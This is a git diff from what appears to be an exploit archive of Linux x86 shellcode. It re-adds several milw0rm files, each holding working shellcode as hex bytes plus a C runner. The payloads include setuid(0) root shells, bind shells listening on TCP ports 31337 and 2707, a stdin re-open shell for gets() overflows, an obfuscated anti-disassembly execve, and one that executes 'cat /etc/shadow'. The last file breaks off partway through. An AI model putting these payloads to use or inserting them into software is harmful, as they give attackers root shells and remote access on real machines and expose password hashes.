* + * "cmd" MUST be terminated with ";" (better with ";exit;" :-D) + * + * bunker - http://rawlab.mindcreations.com + * 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 + * + * setreuid(0, 0); + * 00000000 6a46 push byte +0x46 + * 00000002 58 pop eax + * 00000003 31db xor ebx,ebx + * 00000005 31c9 xor ecx,ecx + * 00000007 cd80 int 0x80 + * + * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL); + * 00000009 eb21 jmp short 0x2c + * 0000000b 5f pop edi + * 0000000c 6a0b push byte +0xb + * 0000000e 58 pop eax + * 0000000f 99 cdq + * 00000010 52 push edx + * 00000011 66682d63 push word 0x632d + * 00000015 89e6 mov esi,esp + * 00000017 52 push edx + * 00000018 682f2f7368 push dword 0x68732f2f + * 0000001d 682f62696e push dword 0x6e69622f + * 00000022 89e3 mov ebx,esp + * 00000024 52 push edx + * 00000025 57 push edi + * 00000026 56 push esi + * 00000027 53 push ebx + * 00000028 89e1 mov ecx,esp + * 0000002a cd80 int 0x80 + * 0000002c e8daffffff call 0xb + * 00000031 .... "cmd; exit;" + */ + +char sc[]= +"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" +"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" +"cat /etc/shadow; exit;"; + +main() { int(*f)()=(int(*)())sc;f(); } + // milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13357.c b/platforms/lin_x86/shellcode/13357.c index 5ce772bf7..96162cba8 100755 --- a/platforms/lin_x86/shellcode/13357.c +++ b/platforms/lin_x86/shellcode/13357.c @@ -1,56 +1,56 @@ -/* - * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ - * - * gets-linux.c - stdin re-open shellcode for Linux/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin - * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh. - * Useful to exploit some gets() buffer overflows in an elegant way... - */ - -/* - * close(0) - * - * 8049380: 31 c0 xor %eax,%eax - * 8049382: 31 db xor %ebx,%ebx - * 8049384: b0 06 mov $0x6,%al - * 8049386: cd 80 int $0x80 - * - * open("/dev/tty", O_RDWR | ...) - * - * 8049388: 53 push %ebx - * 8049389: 68 2f 74 74 79 push $0x7974742f - * 804938e: 68 2f 64 65 76 push $0x7665642f - * 8049393: 89 e3 mov %esp,%ebx - * 8049395: 31 c9 xor %ecx,%ecx - * 8049397: 66 b9 12 27 mov $0x2712,%cx - * 804939b: b0 05 mov $0x5,%al - * 804939d: cd 80 int $0x80 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 804939f: 31 c0 xor %eax,%eax - * 80493a1: 50 push %eax - * 80493a2: 68 2f 2f 73 68 push $0x68732f2f - * 80493a7: 68 2f 62 69 6e push $0x6e69622f - * 80493ac: 89 e3 mov %esp,%ebx - * 80493ae: 50 push %eax - * 80493af: 53 push %ebx - * 80493b0: 89 e1 mov %esp,%ecx - * 80493b2: 99 cltd - * 80493b3: b0 0b mov $0xb,%al - * 80493b5: cd 80 int $0x80 - */ - -char sc[] = -"\x31\xc0\x31\xdb\xb0\x06\xcd\x80" -"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" -"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ + * + * gets-linux.c - stdin re-open shellcode for Linux/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin + * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh. + * Useful to exploit some gets() buffer overflows in an elegant way... + */ + +/* + * close(0) + * + * 8049380: 31 c0 xor %eax,%eax + * 8049382: 31 db xor %ebx,%ebx + * 8049384: b0 06 mov $0x6,%al + * 8049386: cd 80 int $0x80 + * + * open("/dev/tty", O_RDWR | ...) + * + * 8049388: 53 push %ebx + * 8049389: 68 2f 74 74 79 push $0x7974742f + * 804938e: 68 2f 64 65 76 push $0x7665642f + * 8049393: 89 e3 mov %esp,%ebx + * 8049395: 31 c9 xor %ecx,%ecx + * 8049397: 66 b9 12 27 mov $0x2712,%cx + * 804939b: b0 05 mov $0x5,%al + * 804939d: cd 80 int $0x80 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 804939f: 31 c0 xor %eax,%eax + * 80493a1: 50 push %eax + * 80493a2: 68 2f 2f 73 68 push $0x68732f2f + * 80493a7: 68 2f 62 69 6e push $0x6e69622f + * 80493ac: 89 e3 mov %esp,%ebx + * 80493ae: 50 push %eax + * 80493af: 53 push %ebx + * 80493b0: 89 e1 mov %esp,%ecx + * 80493b2: 99 cltd + * 80493b3: b0 0b mov $0xb,%al + * 80493b5: cd 80 int $0x80 + */ + +char sc[] = +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80" +"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13358.c b/platforms/lin_x86/shellcode/13358.c index 022fa217b..8d49daa2b 100755 --- a/platforms/lin_x86/shellcode/13358.c +++ b/platforms/lin_x86/shellcode/13358.c @@ -1,33 +1,33 @@ -/* - * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ - * - * reusage-linux.c - re-use of "/bin/sh" string in .rodata - * Copyright (c) 2003 Marco Ivaldi - * - * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh" - * string stored in the .rodata section of the vulnerable program. Change - * the string address as needed (based on zillion's original idea). - */ - -/* - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 8049368: 31 c0 xor %eax,%eax - * 804936a: bb 08 84 04 08 mov $0x8048408,%ebx # change it - * 804936f: 53 push %ebx - * 8049370: 89 e1 mov %esp,%ecx - * 8049372: 31 d2 xor %edx,%edx - * 8049374: b0 0b mov $0xb,%al - * 8049376: cd 80 int $0x80 - * 8049378: 00 00 add %al,(%eax) - */ - -char sc[] = /* 16 bytes */ -"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ + * + * reusage-linux.c - re-use of "/bin/sh" string in .rodata + * Copyright (c) 2003 Marco Ivaldi + * + * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh" + * string stored in the .rodata section of the vulnerable program. Change + * the string address as needed (based on zillion's original idea). + */ + +/* + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 8049368: 31 c0 xor %eax,%eax + * 804936a: bb 08 84 04 08 mov $0x8048408,%ebx # change it + * 804936f: 53 push %ebx + * 8049370: 89 e1 mov %esp,%ecx + * 8049372: 31 d2 xor %edx,%edx + * 8049374: b0 0b mov $0xb,%al + * 8049376: cd 80 int $0x80 + * 8049378: 00 00 add %al,(%eax) + */ + +char sc[] = /* 16 bytes */ +"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13359.c b/platforms/lin_x86/shellcode/13359.c index e096a58d1..8b9dae5ee 100755 --- a/platforms/lin_x86/shellcode/13359.c +++ b/platforms/lin_x86/shellcode/13359.c @@ -1,42 +1,42 @@ -/* - * $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ - * - * setuid-linux.c - setuid/execve shellcode for Linux/x86 - * Copyright (c) 2004 Marco Ivaldi - * - * Short fully-functional setuid(0) and /bin/sh execve() shellcode. - */ - -/* - * setuid(0) - * - * 8049380: 6a 17 push $0x17 - * 8049382: 58 pop %eax - * 8049383: 31 db xor %ebx,%ebx - * 8049385: cd 80 int $0x80 - * - * execve("/bin//sh", ["/bin//sh"], NULL) - * - * 8049387: 6a 0b push $0xb - * 8049389: 58 pop %eax - * 804938a: 99 cltd - * 804938b: 52 push %edx - * 804938c: 68 2f 2f 73 68 push $0x68732f2f - * 8049391: 68 2f 62 69 6e push $0x6e69622f - * 8049396: 89 e3 mov %esp,%ebx - * 8049398: 52 push %edx - * 8049399: 53 push %ebx - * 804939a: 89 e1 mov %esp,%ecx - * 804939c: cd 80 int $0x80 - */ - -char sc[] = /* 7 + 23 = 30 bytes */ -"\x6a\x17\x58\x31\xdb\xcd\x80" -"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ + * + * setuid-linux.c - setuid/execve shellcode for Linux/x86 + * Copyright (c) 2004 Marco Ivaldi + * + * Short fully-functional setuid(0) and /bin/sh execve() shellcode. + */ + +/* + * setuid(0) + * + * 8049380: 6a 17 push $0x17 + * 8049382: 58 pop %eax + * 8049383: 31 db xor %ebx,%ebx + * 8049385: cd 80 int $0x80 + * + * execve("/bin//sh", ["/bin//sh"], NULL) + * + * 8049387: 6a 0b push $0xb + * 8049389: 58 pop %eax + * 804938a: 99 cltd + * 804938b: 52 push %edx + * 804938c: 68 2f 2f 73 68 push $0x68732f2f + * 8049391: 68 2f 62 69 6e push $0x6e69622f + * 8049396: 89 e3 mov %esp,%ebx + * 8049398: 52 push %edx + * 8049399: 53 push %ebx + * 804939a: 89 e1 mov %esp,%ecx + * 804939c: cd 80 int $0x80 + */ + +char sc[] = /* 7 + 23 = 30 bytes */ +"\x6a\x17\x58\x31\xdb\xcd\x80" +"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13360.c b/platforms/lin_x86/shellcode/13360.c index 35bd8d594..ec5b77b1d 100755 --- a/platforms/lin_x86/shellcode/13360.c +++ b/platforms/lin_x86/shellcode/13360.c @@ -1,109 +1,109 @@ -/* - * $Id: portbind-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ - * - * portbind-linux.c - setuid/portbind shellcode for Linux/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Simple portbind shellcode that bind()'s a setuid(0) shell on - * port 31337/tcp (based on bighawk's code). - * - * Tested on Linux. - */ - -/* - * setuid(0) - * - * 8049380: 31 c0 xor %eax,%eax - * 8049382: 31 db xor %ebx,%ebx - * 8049384: b0 17 mov $0x17,%al - * 8049386: cd 80 int $0x80 - * - * socket(AF_INET, SOCK_STREAM, 0) - * - * 8049388: 31 db xor %ebx,%ebx - * 804938a: f7 e3 mul %ebx - * 804938c: b0 66 mov $0x66,%al - * 804938e: 53 push %ebx - * 804938f: 43 inc %ebx - * 8049390: 53 push %ebx - * 8049391: 43 inc %ebx - * 8049392: 53 push %ebx - * 8049393: 89 e1 mov %esp,%ecx - * 8049395: 4b dec %ebx - * 8049396: cd 80 int $0x80 - * - * bind(s, server, sizeof(server)) - * - * 8049398: 89 c7 mov %eax,%edi - * 804939a: 52 push %edx - * 804939b: 66 68 7a 69 pushw $0x697a - * 804939f: 43 inc %ebx - * 80493a0: 66 53 push %bx - * 80493a2: 89 e1 mov %esp,%ecx - * 80493a4: b0 10 mov $0x10,%al - * 80493a6: 50 push %eax - * 80493a7: 51 push %ecx - * 80493a8: 57 push %edi - * 80493a9: 89 e1 mov %esp,%ecx - * 80493ab: b0 66 mov $0x66,%al - * 80493ad: cd 80 int $0x80 - * - * listen(s, 1) - * - * 80493af: b0 66 mov $0x66,%al - * 80493b1: b3 04 mov $0x4,%bl - * 80493b3: cd 80 int $0x80 - * - * accept(s, 0, 0) - * - * 80493b5: 50 push %eax - * 80493b6: 50 push %eax - * 80493b7: 57 push %edi - * 80493b8: 89 e1 mov %esp,%ecx - * 80493ba: 43 inc %ebx - * 80493bb: b0 66 mov $0x66,%al - * 80493bd: cd 80 int $0x80 - * - * dup2(c, 2) - * dup2(c, 1) - * dup2(c, 0) - * - * 80493bf: 89 d9 mov %ebx,%ecx - * 80493c1: 89 c3 mov %eax,%ebx - * 80493c3: b0 3f mov $0x3f,%al - * 80493c5: 49 dec %ecx - * 80493c6: cd 80 int $0x80 - * 80493c8: 41 inc %ecx - * 80493c9: e2 f8 loop 80493c3 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 80493cb: 51 push %ecx - * 80493cc: 68 6e 2f 73 68 push $0x68732f6e - * 80493d1: 68 2f 2f 62 69 push $0x69622f2f - * 80493d6: 89 e3 mov %esp,%ebx - * 80493d8: 51 push %ecx - * 80493d9: 53 push %ebx - * 80493da: 89 e1 mov %esp,%ecx - * 80493dc: b0 0b mov $0xb,%al - * 80493de: cd 80 int $0x80 - * 80493e0: 00 00 add %al,(%eax) - */ - -char sc[] = /* 8 + 88 = 96 bytes */ -"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" -"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" -"\x89\xc7\x52\x66\x68" -"\x7a\x69" // port 31337/tcp, change if needed -"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" -"\xb0\x66\xb3\x04\xcd\x80" -"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" -"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" -"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: portbind-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ + * + * portbind-linux.c - setuid/portbind shellcode for Linux/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Simple portbind shellcode that bind()'s a setuid(0) shell on + * port 31337/tcp (based on bighawk's code). + * + * Tested on Linux. + */ + +/* + * setuid(0) + * + * 8049380: 31 c0 xor %eax,%eax + * 8049382: 31 db xor %ebx,%ebx + * 8049384: b0 17 mov $0x17,%al + * 8049386: cd 80 int $0x80 + * + * socket(AF_INET, SOCK_STREAM, 0) + * + * 8049388: 31 db xor %ebx,%ebx + * 804938a: f7 e3 mul %ebx + * 804938c: b0 66 mov $0x66,%al + * 804938e: 53 push %ebx + * 804938f: 43 inc %ebx + * 8049390: 53 push %ebx + * 8049391: 43 inc %ebx + * 8049392: 53 push %ebx + * 8049393: 89 e1 mov %esp,%ecx + * 8049395: 4b dec %ebx + * 8049396: cd 80 int $0x80 + * + * bind(s, server, sizeof(server)) + * + * 8049398: 89 c7 mov %eax,%edi + * 804939a: 52 push %edx + * 804939b: 66 68 7a 69 pushw $0x697a + * 804939f: 43 inc %ebx + * 80493a0: 66 53 push %bx + * 80493a2: 89 e1 mov %esp,%ecx + * 80493a4: b0 10 mov $0x10,%al + * 80493a6: 50 push %eax + * 80493a7: 51 push %ecx + * 80493a8: 57 push %edi + * 80493a9: 89 e1 mov %esp,%ecx + * 80493ab: b0 66 mov $0x66,%al + * 80493ad: cd 80 int $0x80 + * + * listen(s, 1) + * + * 80493af: b0 66 mov $0x66,%al + * 80493b1: b3 04 mov $0x4,%bl + * 80493b3: cd 80 int $0x80 + * + * accept(s, 0, 0) + * + * 80493b5: 50 push %eax + * 80493b6: 50 push %eax + * 80493b7: 57 push %edi + * 80493b8: 89 e1 mov %esp,%ecx + * 80493ba: 43 inc %ebx + * 80493bb: b0 66 mov $0x66,%al + * 80493bd: cd 80 int $0x80 + * + * dup2(c, 2) + * dup2(c, 1) + * dup2(c, 0) + * + * 80493bf: 89 d9 mov %ebx,%ecx + * 80493c1: 89 c3 mov %eax,%ebx + * 80493c3: b0 3f mov $0x3f,%al + * 80493c5: 49 dec %ecx + * 80493c6: cd 80 int $0x80 + * 80493c8: 41 inc %ecx + * 80493c9: e2 f8 loop 80493c3 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 80493cb: 51 push %ecx + * 80493cc: 68 6e 2f 73 68 push $0x68732f6e + * 80493d1: 68 2f 2f 62 69 push $0x69622f2f + * 80493d6: 89 e3 mov %esp,%ebx + * 80493d8: 51 push %ecx + * 80493d9: 53 push %ebx + * 80493da: 89 e1 mov %esp,%ecx + * 80493dc: b0 0b mov $0xb,%al + * 80493de: cd 80 int $0x80 + * 80493e0: 00 00 add %al,(%eax) + */ + +char sc[] = /* 8 + 88 = 96 bytes */ +"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" +"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" +"\x89\xc7\x52\x66\x68" +"\x7a\x69" // port 31337/tcp, change if needed +"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" +"\xb0\x66\xb3\x04\xcd\x80" +"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" +"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" +"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13361.c b/platforms/lin_x86/shellcode/13361.c index 5429e0804..e9deb2bfa 100755 --- a/platforms/lin_x86/shellcode/13361.c +++ b/platforms/lin_x86/shellcode/13361.c @@ -1,99 +1,99 @@ -/* - * Shellcode - portbind (84 bytes) - * - * Copyright (c) 2002 Giuseppe Gottardi 'oveRet' - * - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - * SUCH DAMAGE. - * - * - * 8048304: 6a 66 push $0x66 - * 8048306: 58 pop %eax - * 8048307: 6a 01 push $0x1 - * 8048309: 5b pop %ebx - * 804830a: 99 cltd - * 804830b: 52 push %edx - * 804830c: 53 push %ebx - * 804830d: 6a 02 push $0x2 - * 804830f: 89 e1 mov %esp,%ecx - * 8048311: cd 80 int $0x80 - * 8048313: 52 push %edx - * 8048314: 43 inc %ebx - * 8048315: 68 ff 02 0a 93 push $0x930a02ff - * 804831a: 89 e1 mov %esp,%ecx - * 804831c: 6a 10 push $0x10 - * 804831e: 51 push %ecx - * 804831f: 50 push %eax - * 8048320: 89 e1 mov %esp,%ecx - * 8048322: 89 c6 mov %eax,%esi - * 8048324: b0 66 mov $0x66,%al - * 8048326: cd 80 int $0x80 - * 8048328: 43 inc %ebx - * 8048329: 43 inc %ebx - * 804832a: b0 66 mov $0x66,%al - * 804832c: cd 80 int $0x80 - * 804832e: 52 push %edx - * 804832f: 56 push %esi - * 8048330: 89 e1 mov %esp,%ecx - * 8048332: 43 inc %ebx - * 8048333: b0 66 mov $0x66,%al - * 8048335: cd 80 int $0x80 - * 8048337 89 d9 mov %ebx,%ecx - * 8048339: 89 c3 mov %eax,%ebx - * 804833b: b0 3f mov $0x3f,%al - * 804833d: 49 dec %ecx - * 804833e: cd 80 int $0x80 - * 8048340: 41 inc %ecx - * 8048341: e2 f8 loop 804833b - * 8048343: 52 push %edx - * 8048344: 68 6e 2f 73 68 push $0x68732f6e - * 8048349: 68 2f 2f 62 69 push $0x69622f2f - * 804834e: 89 e3 mov %esp,%ebx - * 8048350: 52 push %edx - * 8048351: 53 push %ebx - * 8048352: 89 e1 mov %esp,%ecx - * 8048354: b0 0b mov $0xb,%al - * 8048356: cd 80 int $0x80 - * -*/ - -#include -#define L_PORT "\x0a\x93" /* Port 2707 */ - -char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89" - "\xe1\xcd\x80\x52\x43\x68\xff\x02"L_PORT"\x89\xe1" - "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80" - "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0" - "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" - "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" - "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; - -main() -{ - void (*f)(); - (long) f = &shellcode; - fprintf(stdout, "lenght: %d bytes\n", sizeof(shellcode) - 1); - f(); -} - +/* + * Shellcode - portbind (84 bytes) + * + * Copyright (c) 2002 Giuseppe Gottardi 'oveRet' + * + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + * + * 8048304: 6a 66 push $0x66 + * 8048306: 58 pop %eax + * 8048307: 6a 01 push $0x1 + * 8048309: 5b pop %ebx + * 804830a: 99 cltd + * 804830b: 52 push %edx + * 804830c: 53 push %ebx + * 804830d: 6a 02 push $0x2 + * 804830f: 89 e1 mov %esp,%ecx + * 8048311: cd 80 int $0x80 + * 8048313: 52 push %edx + * 8048314: 43 inc %ebx + * 8048315: 68 ff 02 0a 93 push $0x930a02ff + * 804831a: 89 e1 mov %esp,%ecx + * 804831c: 6a 10 push $0x10 + * 804831e: 51 push %ecx + * 804831f: 50 push %eax + * 8048320: 89 e1 mov %esp,%ecx + * 8048322: 89 c6 mov %eax,%esi + * 8048324: b0 66 mov $0x66,%al + * 8048326: cd 80 int $0x80 + * 8048328: 43 inc %ebx + * 8048329: 43 inc %ebx + * 804832a: b0 66 mov $0x66,%al + * 804832c: cd 80 int $0x80 + * 804832e: 52 push %edx + * 804832f: 56 push %esi + * 8048330: 89 e1 mov %esp,%ecx + * 8048332: 43 inc %ebx + * 8048333: b0 66 mov $0x66,%al + * 8048335: cd 80 int $0x80 + * 8048337 89 d9 mov %ebx,%ecx + * 8048339: 89 c3 mov %eax,%ebx + * 804833b: b0 3f mov $0x3f,%al + * 804833d: 49 dec %ecx + * 804833e: cd 80 int $0x80 + * 8048340: 41 inc %ecx + * 8048341: e2 f8 loop 804833b + * 8048343: 52 push %edx + * 8048344: 68 6e 2f 73 68 push $0x68732f6e + * 8048349: 68 2f 2f 62 69 push $0x69622f2f + * 804834e: 89 e3 mov %esp,%ebx + * 8048350: 52 push %edx + * 8048351: 53 push %ebx + * 8048352: 89 e1 mov %esp,%ecx + * 8048354: b0 0b mov $0xb,%al + * 8048356: cd 80 int $0x80 + * +*/ + +#include +#define L_PORT "\x0a\x93" /* Port 2707 */ + +char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89" + "\xe1\xcd\x80\x52\x43\x68\xff\x02"L_PORT"\x89\xe1" + "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80" + "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0" + "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" + "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; + +main() +{ + void (*f)(); + (long) f = &shellcode; + fprintf(stdout, "lenght: %d bytes\n", sizeof(shellcode) - 1); + f(); +} + // milw0rm.com [2006-07-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13362.c b/platforms/lin_x86/shellcode/13362.c index df8ced55f..1a903e61e 100755 --- a/platforms/lin_x86/shellcode/13362.c +++ b/platforms/lin_x86/shellcode/13362.c @@ -1,66 +1,66 @@ -/* execve() shellcode with 'fuck up disasm' ability, 32 bytes long - by BaCkSpAcE [sinisa86(at)gmail(dot)com] - BitByterz Labs 2006 - http://www.bitbyterz.org - -; -; shellcode.asm -; - fupdisasm: - db 0x68 ; opcode for PUSH DW instruction - db 0xcd ; crypt+1, opcode for INT instruction - db 0x80 ; interrupt number (80 in this case) - db 0x68 ; crypt+3 - db 0x68 - jmp fupdisasm+3 - db 0x68 ; MAGIC_BYTE: this byte makes disasm go crazy - -; our shellcode which we want to hide - push byte 11 - pop eax - xor edx, edx - push edx - push 0x68732f2f - push 0x6e69622f - mov ebx, esp - push edx - push ebx - mov ecx, esp - jmp fupdisasm+1 ; jumps on address where is hidden int 0x80 - - - backspace@bitbyterz# nasm shellcode.asm - backspace@bitbyterz# ndisasm -u shellcode - 00000000 68CD806868 push dword 0x686880cd - 00000005 EBFC jmp short 0x3 - 00000007 686A0B5831 push dword 0x31580b6a - 0000000C D25268 rcl byte [edx+0x68],cl - 0000000F 2F das - 00000010 2F das - 00000011 7368 jnc 0x7b - 00000013 682F62696E push dword 0x6e69622f - 00000018 89E3 mov ebx,esp - 0000001A 52 push edx - 0000001B 53 push ebx - 0000001C 89E1 mov ecx,esp - 0000001E EBE1 jmp short 0x1 - - Find difference between original and dissasembled shellcode ;) -*/ - -#include -#include - -char shellcode[] = "\x68\xcd\x80\x68\x68\xeb\xfc\x68" - "\x6a\x0b\x58\x31\xd2\x52\x68\x2f" - "\x2f\x73\x68\x68\x2f\x62\x69\x6e" - "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"; - -main() { - void (*fp) (void); - fp = (void *) shellcode; - printf ("%d bytes\n", strlen(shellcode)); - fp(); -} - +/* execve() shellcode with 'fuck up disasm' ability, 32 bytes long + by BaCkSpAcE [sinisa86(at)gmail(dot)com] + BitByterz Labs 2006 + http://www.bitbyterz.org + +; +; shellcode.asm +; + fupdisasm: + db 0x68 ; opcode for PUSH DW instruction + db 0xcd ; crypt+1, opcode for INT instruction + db 0x80 ; interrupt number (80 in this case) + db 0x68 ; crypt+3 + db 0x68 + jmp fupdisasm+3 + db 0x68 ; MAGIC_BYTE: this byte makes disasm go crazy + +; our shellcode which we want to hide + push byte 11 + pop eax + xor edx, edx + push edx + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + push edx + push ebx + mov ecx, esp + jmp fupdisasm+1 ; jumps on address where is hidden int 0x80 + + + backspace@bitbyterz# nasm shellcode.asm + backspace@bitbyterz# ndisasm -u shellcode + 00000000 68CD806868 push dword 0x686880cd + 00000005 EBFC jmp short 0x3 + 00000007 686A0B5831 push dword 0x31580b6a + 0000000C D25268 rcl byte [edx+0x68],cl + 0000000F 2F das + 00000010 2F das + 00000011 7368 jnc 0x7b + 00000013 682F62696E push dword 0x6e69622f + 00000018 89E3 mov ebx,esp 